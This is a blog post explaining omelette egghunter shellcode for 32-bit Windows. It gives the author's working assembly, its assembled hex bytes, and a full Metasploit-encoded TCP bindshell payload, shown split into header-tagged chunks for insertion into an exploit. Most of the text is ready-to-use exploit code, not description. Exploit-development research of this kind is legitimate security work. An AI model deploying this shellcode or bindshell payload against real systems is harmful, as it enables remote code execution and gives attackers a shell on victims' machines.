31 Oct 2013
Introduction
When I first heard about omlette egghunter shellcode I was pretty keen to give it a try, but did not have the opportunity until after I heard that under some unknown circumstances it "doesn't work" (see the note here). At that point I thought Id have a try at writing some omlette egghunter shellcode myself. Then about three years passed until I finally got around to doing it.
Omlette Shellcode
What is it? Omlette shellcode is essentially a variation on egghunter shellcode. As previously discussed on this blog, egghunter shellcode is a small piece of shellcode, suitable for inserting into space restricted program buffers. Its job is to find, and pass control to, larger sections of shellcode (or "eggs") located in program memory. Traditional egghunter implementations will usually expect that the "egg" will be inserted into memory in one piece. Omlette shellcode allows you to insert your egg into memory in multiple pieces, and handles the tasks of finding those pieces, sticking them together, and finally passing control to the reconstructed egg. You would use it in exploits where you don't have enough space to include your entire final payload into memory using a single buffer.
Its a bit of a niche thing, and I don't imagine it will be required in too many exploits, but I was interested in having a go at writing an implementation myself.
My Implementation
My implementation uses the syscall method for safely searching Windows memory as documented by Matt Miller, and is based on a modification of his egghunter code from here.
I essentially took his memory searching code, modified parts of it to replace stack operations with direct register operations, and added some extra bits at the start and the end to enable the egg to be reconstructed on the stack and then run.
Heres the assembly:
BITS 32
begin:
MOV EBP, ESP ; Get stack pointer into EBP to provide starting offset for location to write shellcode
loop_inc_page:
OR BX, 0x0fff ; Add PAGE_SIZE-1 to EBX
loop_inc_one:
INC EBX ; Increment memory pointer EBX+1
syscall_access:
XOR EAX, EAX ; Zero EAX
MOV AL, 0x02 ; Set EAX for syscall NtAccessCheckAndAuditAlarm
MOV EDX, EBX ; Set EDX to memory location for syscall. The syscall clobbers EDX so we cant use it for persistent address storage
INT 0x2e ; Perform the syscall
CMP AL, 0x05 ; Checking for 0xc0000005 (ACCESS_VIOLATION)
JE loop_inc_page ; Invalid memory, go to next memory page
check_marker:
MOV EAX, 0x78563412 ; Put egg marker in EAX
MOV EDI, EBX ; Set EDI to the valid memory location from EBX
SCASD ; Compare the dword in [EDI] to marker in EAX, increment EDI+4
JNZ loop_inc_one ; No match? Back to searching loop
SCASD ; Compare the dword in [EDI] to EAX again, increment EDI+4
JNZ loop_inc_one ; No match? Back to searching loop
copy_egg_chunk:
MOV ESI, EDI ; Move memory location of start of egg data to ESI
MOV EDI, EBP ; Move memory location to write egg to EDI
LODSW ; Move word of memory from [ESI] into EAX, increment ESI+2. AH has chunk size, AL has flag value.
XOR ECX, ECX ; Zero ECX
MOV CL, AH ; Copy AH (egg chunk size) to CL to use as counter for REP MOVSB operation
CMP AL, 0x01 ; Compare flag value in AL to 1 to see if we have written final egg chunk
REP MOVSB ; Copy ECX number of bytes from [ESI] to [EDI]. Increments EDI and ESI by ECX
MOV EBP, EDI ; EBP stores address of end of written shellcode
JNE loop_inc_one ; Jump back to searching loop if we have not written final egg chunk
JMP ESP ; Jump to start of completed egg
Once assembled the code comes out as 53 bytes in size.
Caveats
Some caveats on the use of this shellcode:
- Like Matt Millers original egghunter, it assumes that the direction flag is unset. This will be the case most of the time, but if not you can add a "CLD - \xfc" instruction to the start to clear it.
- The final "egg" is assembled on the stack starting at the ESP register. Make sure you don't have anything you need at that location in memory, because it will be overwritten. Be careful of where the egghunter code itself is located (so you don't overwrite it mid operation) and pivot first if you need to.
- The egg chunks need to be located in memory IN ORDER. The egghunter searches memory in ascending order, and it will append the chunks together in the order it finds them until it reaches the final chunk, whereupon it passes control to the reconstructed shellcode. This might limit the exploits you can use it in - memory ordering may not always be something you can control.
- I have only tested this on Windows XP SP3. Presumably it will work on other 32 bit Windows versions too, let me know if not and I'll see if I can fix it. It is very unlikely to work for 32 bit apps on 64 bit Windows systems.
Usage
The use of this egghunter is similar to that of Matt Millers original, (click here if you need a reminder of how this works), except instead of inserting the payload using one buffer, you break it up into multiple chunks first. Each chunk can be of any size up to 255 bytes, and there is no need to maintain consistency in chunk sizes (the chunks can all be different sizes if you want). Before getting the chunks into memory you have to add a 10 byte header to each chunk which consists of a twice repeating 4 byte "marker" value that helps the egghunter find the egg, followed by a one byte "final chunk" flag value and a one byte size value. The "final chunk" flag value is set to a "\x01" for the final egg chunk (chunk n), and to any other value for chunks 1 through n-1.
Lets consider an example. Assume you have to write an exploit where the initial buffer you can access after gaining control of processor execution is just big enough for this omlette shellcode. However, you can also control the contents of four other memory buffers with about 110 bytes of usable space in each.
First compile the assembly code with nasm and dump the compiled output in hex format to paste into your exploit. You can edit the marker value in the code first if you want to change it. The default value in the assembly above is 0x78563412 which will mean you need to send \x12\x34\x56\x78 as the marker in your exploit (remember: bytes in little endian order). Save the assembly as omlette.asm and do the following:
wolverine:~ stephen$ nasm -f bin omlette.asm -o omlette
wolverine:~ stephen$ cat omlette | perl -e 'print chr(0x22); while (read STDIN, $d, 1) {print "\\x" . sprintf( "%02x", ord($d)); $c++; if ($c == 14) {print chr(0x22) . " .\n" . chr(0x22);$c=0}}; print chr(0x22) . ";\n"'
"\x89\xe5\x66\x81\xcb\xff\x0f\x43\x31\xc0\xb0\x02\x89\xda" .
"\xcd\x2e\x3c\x05\x74\xee\xb8\x12\x34\x56\x78\x89\xdf\xaf" .
"\x75\xe9\xaf\x75\xe6\x89\xfe\x89\xef\x66\xad\x31\xc9\x88" .
"\xe1\x3c\x01\xf3\xa4\x89\xfd\x75\xd4\xff\xe4";
Lets say the final shellcode you want to use is a Metasploit generated Windows 368 byte shikata_ga_nai encoded TCP bindshell payload like the following:
"\xdb\xdd\xd9\x74\x24\xf4\xbb\xfd\x10\xd0\xec\x5f\x33\xc9" .
"\xb1\x56\x31\x5f\x18\x03\x5f\x18\x83\xef\x01\xf2\x25\x10" .
"\x11\x7a\xc5\xe9\xe1\x1d\x4f\x0c\xd0\x0f\x2b\x44\x40\x80" .
"\x3f\x08\x68\x6b\x6d\xb9\xfb\x19\xba\xce\x4c\x97\x9c\xe1" .
"\x4d\x19\x21\xad\x8d\x3b\xdd\xac\xc1\x9b\xdc\x7e\x14\xdd" .
"\x19\x62\xd6\x8f\xf2\xe8\x44\x20\x76\xac\x54\x41\x58\xba" .
"\xe4\x39\xdd\x7d\x90\xf3\xdc\xad\x08\x8f\x97\x55\x23\xd7" .
"\x07\x67\xe0\x0b\x7b\x2e\x8d\xf8\x0f\xb1\x47\x31\xef\x83" .
"\xa7\x9e\xce\x2b\x2a\xde\x17\x8b\xd4\x95\x63\xef\x69\xae" .
"\xb7\x8d\xb5\x3b\x2a\x35\x3e\x9b\x8e\xc7\x93\x7a\x44\xcb" .
"\x58\x08\x02\xc8\x5f\xdd\x38\xf4\xd4\xe0\xee\x7c\xae\xc6" .
"\x2a\x24\x75\x66\x6a\x80\xd8\x97\x6c\x6c\x85\x3d\xe6\x9f" .
"\xd2\x44\xa5\xf7\x17\x7b\x56\x08\x3f\x0c\x25\x3a\xe0\xa6" .
"\xa1\x76\x69\x61\x35\x78\x40\xd5\xa9\x87\x6a\x26\xe3\x43" .
"\x3e\x76\x9b\x62\x3e\x1d\x5b\x8a\xeb\xb2\x0b\x24\x43\x73" .
"\xfc\x84\x33\x1b\x16\x0b\x6c\x3b\x19\xc1\x1b\x7b\xd7\x31" .
"\x48\xec\x1a\xc6\x6a\x3e\x93\x20\x18\xae\xf2\xfb\xb4\x0c" .
"\x21\x34\x23\x6e\x03\x68\xfc\xf8\x1b\x66\x3a\x06\x9c\xac" .
"\x69\xab\x34\x27\xf9\xa7\x80\x56\xfe\xed\xa0\x11\xc7\x66" .
"\x3a\x4c\x8a\x17\x3b\x45\x7c\xbb\xae\x02\x7c\xb2\xd2\x9c" .
"\x2b\x93\x25\xd5\xb9\x09\x1f\x4f\xdf\xd3\xf9\xa8\x5b\x08" .
"\x3a\x36\x62\xdd\x06\x1c\x74\x1b\x86\x18\x20\xf3\xd1\xf6" .
"\x9e\xb5\x8b\xb8\x48\x6c\x67\x13\x1c\xe9\x4b\xa4\x5a\xf6" .
"\x81\x52\x82\x47\x7c\x23\xbd\x68\xe8\xa3\xc6\x94\x88\x4c" .
"\x1d\x1d\xb8\x06\x3f\x34\x51\xcf\xaa\x04\x3c\xf0\x01\x4a" .
"\x39\x73\xa3\x33\xbe\x6b\xc6\x36\xfa\x2b\x3b\x4b\x93\xd9" .
"\x3b\xf8\x94\xcb";
To use this, you would first add some NOP padding (shikata_ga_nai tends to error out if you don't pad between the start of the code and the stack pointer), and then break it up into four chunks of 96 bytes each, like shown below. Note that the egghunter shellcode doesn't require that the chunks be the same size, that's just the easiest way to do it in this case.
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\xdb\xdd\xd9\x74\x24\xf4\xbb\xfd\x10\xd0\xec\x5f" .
"\x33\xc9\xb1\x56\x31\x5f\x18\x03\x5f\x18\x83\xef\x01\xf2" .
"\x25\x10\x11\x7a\xc5\xe9\xe1\x1d\x4f\x0c\xd0\x0f\x2b\x44" .
"\x40\x80\x3f\x08\x68\x6b\x6d\xb9\xfb\x19\xba\xce\x4c\x97" .
"\x9c\xe1\x4d\x19\x21\xad\x8d\x3b\xdd\xac\xc1\x9b\xdc\x7e" .
"\x14\xdd\x19\x62\xd6\x8f\xf2\xe8\x44\x20\x76\xac";
"\x54\x41\x58\xba\xe4\x39\xdd\x7d\x90\xf3\xdc\xad\x08\x8f" .
"\x97\x55\x23\xd7\x07\x67\xe0\x0b\x7b\x2e\x8d\xf8\x0f\xb1" .
"\x47\x31\xef\x83\xa7\x9e\xce\x2b\x2a\xde\x17\x8b\xd4\x95" .
"\x63\xef\x69\xae\xb7\x8d\xb5\x3b\x2a\x35\x3e\x9b\x8e\xc7" .
"\x93\x7a\x44\xcb\x58\x08\x02\xc8\x5f\xdd\x38\xf4\xd4\xe0" .
"\xee\x7c\xae\xc6\x2a\x24\x75\x66\x6a\x80\xd8\x97\x6c\x6c" .
"\x85\x3d\xe6\x9f\xd2\x44\xa5\xf7\x17\x7b\x56\x08";
"\x3f\x0c\x25\x3a\xe0\xa6\xa1\x76\x69\x61\x35\x78\x40\xd5" .
"\xa9\x87\x6a\x26\xe3\x43\x3e\x76\x9b\x62\x3e\x1d\x5b\x8a" .
"\xeb\xb2\x0b\x24\x43\x73\xfc\x84\x33\x1b\x16\x0b\x6c\x3b" .
"\x19\xc1\x1b\x7b\xd7\x31\x48\xec\x1a\xc6\x6a\x3e\x93\x20" .
"\x18\xae\xf2\xfb\xb4\x0c\x21\x34\x23\x6e\x03\x68\xfc\xf8" .
"\x1b\x66\x3a\x06\x9c\xac\x69\xab\x34\x27\xf9\xa7\x80\x56" .
"\xfe\xed\xa0\x11\xc7\x66\x3a\x4c\x8a\x17\x3b\x45";
"\x7c\xbb\xae\x02\x7c\xb2\xd2\x9c\x2b\x93\x25\xd5\xb9\x09" .
"\x1f\x4f\xdf\xd3\xf9\xa8\x5b\x08\x3a\x36\x62\xdd\x06\x1c" .
"\x74\x1b\x86\x18\x20\xf3\xd1\xf6\x9e\xb5\x8b\xb8\x48\x6c" .
"\x67\x13\x1c\xe9\x4b\xa4\x5a\xf6\x81\x52\x82\x47\x7c\x23" .
"\xbd\x68\xe8\xa3\xc6\x94\x88\x4c\x1d\x1d\xb8\x06\x3f\x34" .
"\x51\xcf\xaa\x04\x3c\xf0\x01\x4a\x39\x73\xa3\x33\xbe\x6b" .
"\xc6\x36\xfa\x2b\x3b\x4b\x93\xd9\x3b\xf8\x94\xcb";
Then prepend a header to each chunk comprised of the marker ("\x12\x34\x56\x78") repeated twice, a single byte flag value ("\x01" for the final chunk, and anything else, I have used "\x02", for the other chunks) and a single byte size value ("\x60" as the hex representation of 96).
"\x12\x34\x56\x78\x12\x34\x56\x78\x02\x60\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xdb\xdd" .
"\xd9\x74\x24\xf4\xbb\xfd\x10\xd0\xec\x5f\x33\xc9\xb1\x56" .
"\x31\x5f\x18\x03\x5f\x18\x83\xef\x01\xf2\x25\x10\x11\x7a" .
"\xc5\xe9\xe1\x1d\x4f\x0c\xd0\x0f\x2b\x44\x40\x80\x3f\x08" .
"\x68\x6b\x6d\xb9\xfb\x19\xba\xce\x4c\x97\x9c\xe1\x4d\x19" .
"\x21\xad\x8d\x3b\xdd\xac\xc1\x9b\xdc\x7e\x14\xdd\x19\x62" .
"\xd6\x8f\xf2\xe8\x44\x20\x76\xac";
"\x12\x34\x56\x78\x12\x34\x56\x78\x02\x60\x54\x41\x58\xba" .
"\xe4\x39\xdd\x7d\x90\xf3\xdc\xad\x08\x8f\x97\x55\x23\xd7" .
"\x07\x67\xe0\x0b\x7b\x2e\x8d\xf8\x0f\xb1\x47\x31\xef\x83" .
"\xa7\x9e\xce\x2b\x2a\xde\x17\x8b\xd4\x95\x63\xef\x69\xae" .
"\xb7\x8d\xb5\x3b\x2a\x35\x3e\x9b\x8e\xc7\x93\x7a\x44\xcb" .
"\x58\x08\x02\xc8\x5f\xdd\x38\xf4\xd4\xe0\xee\x7c\xae\xc6" .
"\x2a\x24\x75\x66\x6a\x80\xd8\x97\x6c\x6c\x85\x3d\xe6\x9f" .
"\xd2\x44\xa5\xf7\x17\x7b\x56\x08";
"\x12\x34\x56\x78\x12\x34\x56\x78\x02\x60\x3f\x0c\x25\x3a" .
"\xe0\xa6\xa1\x76\x69\x61\x35\x78\x40\xd5\xa9\x87\x6a\x26" .
"\xe3\x43\x3e\x76\x9b\x62\x3e\x1d\x5b\x8a\xeb\xb2\x0b\x24" .
"\x43\x73\xfc\x84\x33\x1b\x16\x0b\x6c\x3b\x19\xc1\x1b\x7b" .
"\xd7\x31\x48\xec\x1a\xc6\x6a\x3e\x93\x20\x18\xae\xf2\xfb" .
"\xb4\x0c\x21\x34\x23\x6e\x03\x68\xfc\xf8\x1b\x66\x3a\x06" .
"\x9c\xac\x69\xab\x34\x27\xf9\xa7\x80\x56\xfe\xed\xa0\x11" .
"\xc7\x66\x3a\x4c\x8a\x17\x3b\x45";
"\x12\x34\x56\x78\x12\x34\x56\x78\x01\x60\x7c\xbb\xae\x02" .
"\x7c\xb2\xd2\x9c\x2b\x93\x25\xd5\xb9\x09\x1f\x4f\xdf\xd3" .
"\xf9\xa8\x5b\x08\x3a\x36\x62\xdd\x06\x1c\x74\x1b\x86\x18" .
"\x20\xf3\xd1\xf6\x9e\xb5\x8b\xb8\x48\x6c\x67\x13\x1c\xe9" .
"\x4b\xa4\x5a\xf6\x81\x52\x82\x47\x7c\x23\xbd\x68\xe8\xa3" .
"\xc6\x94\x88\x4c\x1d\x1d\xb8\x06\x3f\x34\x51\xcf\xaa\x04" .
"\x3c\xf0\x01\x4a\x39\x73\xa3\x33\xbe\x6b\xc6\x36\xfa\x2b" .
"\x3b\x4b\x93\xd9\x3b\xf8\x94\xcb";
Now you would insert these various sets of bad data into your exploit in the appropriate places, and when the egghunter shellcode is executed, it should be able to find the chunks of the final payload in memory, piece them together on the stack, and then pass control to it when all parts are found.
Id be interested to know if you find this useful. Perhaps someone has even written an example program which could be exploited with the use of this shellcode if you would like to test it... (*cough* GTER *cough*).